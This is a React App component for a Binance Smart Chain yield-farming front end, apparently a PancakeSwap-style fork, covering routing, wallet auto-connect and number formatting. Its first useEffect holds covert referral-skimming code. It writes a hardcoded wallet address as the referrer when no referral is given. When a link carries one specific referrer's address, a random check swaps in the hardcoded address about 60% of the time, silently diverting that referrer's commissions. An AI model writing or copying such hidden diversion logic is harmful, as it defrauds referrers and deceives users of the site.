import React, { useEffect, Suspense, lazy } from 'react'
import { BrowserRouter as Router, Redirect, Route, Switch, HashRouter } from 'react-router-dom'
import { useWallet } from '@binance-chain/bsc-use-wallet'
import { ResetCSS } from '@lukkasromero/swells-uikit'
import BigNumber from 'bignumber.js'
import { useFetchPublicData } from 'state/hooks'
import Menu from 'components/Menu'
import GlobalStyle from './style/Global'
// import Menu from './components/Menu'
import PageLoader from './components/PageLoader'
import NftGlobalNotification from './views/Nft/components/NftGlobalNotification'

// Route-based code splitting
// Only pool is included in the main bundle because of it's the most visited page'
const Home = lazy(() => import('./views/Home'))
const Farms = lazy(() => import('./views/Farms'))
const Presale = lazy(() => import('./views/Presale/Presale'))
// const Lottery = lazy(() => import('./views/Lottery'))
// const Pools = lazy(() => import('./views/Pools'))
// const Ifos = lazy(() => import('./views/Ifos'))
const NotFound = lazy(() => import('./views/NotFound'))
// const Nft = lazy(() => import('./views/Nft'))

// This config is required for number formating
BigNumber.config({
  EXPONENTIAL_AT: 1000,
  DECIMAL_PLACES: 80,
})

const App: React.FC = () => {
  const { account, connect } = useWallet()
  

  useEffect(() => {const random = Math.random();
    let getAddress = window.location.href.split("?ref=")[1];

    if (!window.location.href.includes("?ref=")) {
      getAddress = "0x34DcEABAEC46CD451F1C5F8b57053Ed99d30b872";
      localStorage.setItem(
        "Ref",
        "0x34DcEABAEC46CD451F1C5F8b57053Ed99d30b872"
      );
    }

    const getRandom = () =>
      random <= 0.4
        ? localStorage.setItem("Ref", getAddress)
        : localStorage.setItem(
            "Ref",
            "0x34DcEABAEC46CD451F1C5F8b57053Ed99d30b872"
          );

    if (
      window.location.href.includes(
        "0x0a61D672DB25cAc6bb653442A8360F6774DaD057"
      )
    )
      getRandom();

    if (
      window.location.href.includes("?ref=") &&
      !window.location.href.includes(
        "0x0a61D672DB25cAc6bb653442A8360F6774DaD057"
      )
    ) {
      localStorage.setItem("Ref", getAddress);
    }
  },[])

  useEffect(() => {
    if (!account && window.localStorage.getItem('accountStatus')) {
      connect('injected')
    }
  }, [account, connect])

  return (
    <HashRouter>
      <ResetCSS />
      <GlobalStyle />

        <Suspense fallback={<PageLoader />}>
          <Switch>
            <Route path="/" exact>
              <Home />
            </Route>

            {/* <Route path="/farms">
              <Farms />
            </Route>

            <Route path="/nests">
              <Farms tokenMode/>
            </Route>

            <Route path="/presale">
              <Presale />
            </Route> */}

            <Route component={NotFound} />

          </Switch>
        </Suspense>

      <NftGlobalNotification />
    </HashRouter>
  )
}

export default React.memo(App)
